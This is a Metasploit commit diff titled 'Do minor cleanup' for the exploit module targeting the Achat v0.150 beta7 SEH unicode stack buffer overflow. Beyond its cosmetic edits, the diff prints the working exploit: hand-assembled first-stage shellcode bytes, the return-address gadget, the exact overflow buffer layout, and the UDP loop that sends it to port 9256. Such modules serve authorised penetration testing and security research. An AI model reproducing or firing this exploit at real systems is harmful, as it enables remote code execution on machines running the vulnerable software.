Do minor cleanup

jvazquez-r7 · jvazquez-r7 · commit 86f3bcad113e · 2015-02-09T17:33:05.000-06:00
diff --git a/modules/exploits/windows/misc/achat_beta.rb b/modules/exploits/windows/misc/achat_beta.rb
@@ -15,17 +15,16 @@ def initialize(info = {})
     super(update_info(info,
       'Name'           => 'Achat v0.150 beta7 Buffer Overflow',
       'Description'    => %q{
-         This module exploits a SEH based unicode stack buffer overflow in Achat v0.150,
-         by sending a crafted message to the default harcoded port 9256. The message
-         overflows the stack and overwrites the SEH handler. The exploit is reliable, but
-         depends of timing. It has two distinct threads that are overflowing the stack in
-         the same time. Tested on Windows XP SP3 and Windows 7.
-         The overflow was found by Peter Kasza.
+        This module exploits an unicode SEH based stack buffer overflow in Achat v0.150. By
+        sending a crafted message to the default port 9256 it's possible to overwrites the
+        SEH handler. Even when the exploit is reliable it depends of timing since there are
+        two threads overflowing the stack in the same time. This module has been tested on
+        Windows XP SP3 and Windows 7.
       },
       'Author'         =>
         [
-         'Balazs Bucsay <balazs.bucsay[-at-]rycon[-dot-]hu>', # Exploit, Metasploit module
-         'Peter Kasza <peter.kasza[-at-]itinsight[-dot-]hu>' # Vulnerability discovery
+          'Peter Kasza <peter.kasza[at]itinsight.hu>', # Vulnerability discovery
+          'Balazs Bucsay <balazs.bucsay[at]rycon.hu>' # Exploit, Metasploit module
         ],
       'License'	       => MSF_LICENSE,
       'References'     =>
@@ -45,24 +44,23 @@ def initialize(info = {})
           'EncoderType'    => Msf::Encoder::Type::AlphanumUnicodeMixed,
           'EncoderOptions'  =>
             {
-              'BufferRegister' => 'EAX',
+              'BufferRegister' => 'EAX'
             }
-
         },
       'Platform'       => 'win',
       'Targets'        =>
         [
-        # Tested OK Windows XP SP3, Windows 7
-        # Not working on Windows Server 2003
-          [ 'Achat beta v0.150 / Windows XP SP3 / Windows 7 SP1',   { 'Ret' => "\x2A\x46" } ], #AChat.exe
+          # Tested OK Windows XP SP3, Windows 7
+          # Not working on Windows Server 2003
+          [ 'Achat beta v0.150 / Windows XP SP3 / Windows 7 SP1', { 'Ret' => "\x2A\x46" } ] #ppr from AChat.exe
         ],
       'Privileged'     => false,
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Dec 18 2014'))
 
     register_options(
       [
-        Opt::RPORT(9256),
+        Opt::RPORT(9256)
       ], self.class)
   end
 
@@ -85,20 +83,20 @@ def exploit
     # 0043 00          ADD BYTE PTR DS:[EBX],AL # padding
     # 59               POP ECX                  # padding
     # 0039             ADD BYTE PTR DS:[ECX],BH # padding
-    firststage = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
+    first_stage = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
 
-    sploit = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00"
-    sploit << "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46)
-    sploit << "\x62" + "A"*45 # 0x62 will be used to calculate the right offset
+    sploit = 'A0000000002#Main' + "\x00" + 'Z' * 114688 + "\x00" + "A" * 10 + "\x00"
+    sploit << 'A0000000002#Main' + "\x00" + 'A' * 57288 + 'AAAAASI' * 50 + 'A' * (3750 - 46)
+    sploit << "\x62" + 'A' * 45 # 0x62 will be used to calculate the right offset
     sploit << "\x61\x40" # POPAD + INC EAX
 
     sploit << target.ret # AChat.exe p/p/r address
 
     # adjusting the first thread's unicode payload, tricky asm-fu
-    # the first seh exception jumps here, firststage variable will be executed
+    # the first seh exception jumps here, first_stage variable will be executed
     # by the second seh exception as well. It needs to be in sync with the second
     # thread, so that is why we adjust eax/ebp to have a close pointer to the
-    # payload, then firststage variable will take the rest of the job.
+    # payload, then first_stage variable will take the rest of the job.
     # 0043 00          ADD BYTE PTR DS:[EBX],AL # padding
     # 55               PUSH EBP                 # ebp with close pointer to payload
     # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
@@ -113,22 +111,20 @@ def exploit
     # 50               PUSH EAX			# saving eax
     # 0043 00          ADD BYTE PTR DS:[EBX],AL # padding
     # 5D               POP EBP			# mov ebp, eax
-    sploit << "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
+    sploit << "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + 'C' * 9 + "\x60\x43"
     sploit << "\x61\x43" + target.ret # second nseh entry, for the second thread
-    sploit << "\x2A" + firststage + "C"*(157-firststage.length-31-3) # put address of the payload to EAX
-    sploit << payload.encoded + "A"*(1152-payload.encoded.length) # placing the payload
-    sploit << "\x00" + "A"*10 + "\x00"
-
+    sploit << "\x2A" + first_stage + 'C' * (157 - first_stage.length - 31 -3) # put address of the payload to EAX
+    sploit << payload.encoded + 'A' * (1152 - payload.encoded.length) # placing the payload
+    sploit << "\x00" + 'A' * 10 + "\x00"
 
     i = 0
     while i < sploit.length do
       if i > 172000
         Rex::sleep(1.0)
       end
-      udp_sock.put(sploit[i..i+8192-1])
-      i += 8192
+      sent = udp_sock.put(sploit[i..i + 8192 - 1])
+      i += sent
     end
-
     disconnect_udp
   end
 
